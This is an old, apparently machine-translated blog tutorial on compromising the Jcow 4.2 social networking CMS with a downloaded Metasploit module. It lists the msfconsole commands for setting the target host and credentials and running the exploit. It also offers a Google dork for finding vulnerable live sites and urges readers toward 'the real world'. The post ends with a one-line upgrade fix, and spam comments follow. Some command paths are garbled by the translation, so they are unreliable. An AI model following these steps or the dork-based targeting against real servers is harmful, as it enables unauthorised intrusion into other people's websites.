Friday, September 16, 2011

Hacking Jcow Webserver Social Networking

2 komentar
Do your friends ever see the CMS on this one? Jcow social networking ... Yes, it was the name ... Jcow offer web-based applications for social networking site for free alias free and can be viewed at their website jcow.net with a fairly small file size is only 777KB of not more than 1 MB.
Jcow
But here I will discuss is not about the use of the Jcow this as a friendship site, but the presence of a vulnerability of some version of Jcow which turned out to be compromised in just 4 steps , And even the intruder can see the contents of the victim web server directory (if it turns out the server did not implement good security).
In the example I will make below, using the victim's IP: 192.168.8.94 ...
Much better if my friends want to learn using a virtual lab first, but if it's curious to direct to the wild arena, folks can also search via google dork: "Powered by Jcow 4.2.0". If you are interested to go directly to the real world, my friends also have to learn the logic of the attack techniques via the internet ( click here )
OS Attacker: BT 5 R1
Victim OS: XP SP3
Vulnerable applications: Jcow 4.2
In my previous article has also been made username: "victim and the password:" victim "in the application Jcow target.
Okay we start step by step below
Needs:
1. Metasploit Framework (metasploit.com)
2. Jcow.rb exploit script ( mediafire link on the website of origin )
The steps:
1. Copy the file jcow.rb exploits that have been downloaded into the folder / pentest / exploits / framework / modules / exploits / remote /
jcow.rb cp / pentest / exploits / framework / modules / exploits / remote /
If confused how to copy my files into Backtrack Linux exploit.rb, folks can see the tutorial here .
2. Open msfconsole metasploit console by typing in a terminal, then use the previous exploits that we copied earlier.
msf> use exploit / remote / Jcow
3. Next type the command show switch options to see what can be used to exploit this.

msf exploit (Jcow)> set rhost 192.168.8.94 -> IP target
rhost => 192.168.8.94
msf exploit (Jcow)> set username victim -> sets the username
username => victim
msf exploit (Jcow)> set password victim -> set password
password => victim
4. Yep after everything is done properly configured, the last step just run the command on the console metasploit exploit.

Succeed
Security:
1. Upgrade to the latest version Jcow

2 Responses so far

  1. Anonymous says:
    June 2, 2013 at 10:58 AM

    Sweet blog! I found it while surfing around on Yahoo News.
    Do you have any tips on how to get listed in Yahoo News?
    I've been trying for a while but I never seem to get there! Cheers

    Also visit my web-site: www.tedxyse.com

  2. Anonymous says:
    June 4, 2013 at 1:40 AM

    If you are going for best contents like I do, simply pay a quick visit this web site daily for the reason
    that it gives quality contents, thanks

    Feel free to visit my website - sexmovievault.com

Leave a Reply

Subscribe to: Post Comments (Atom)
 

dafa blogs © 2011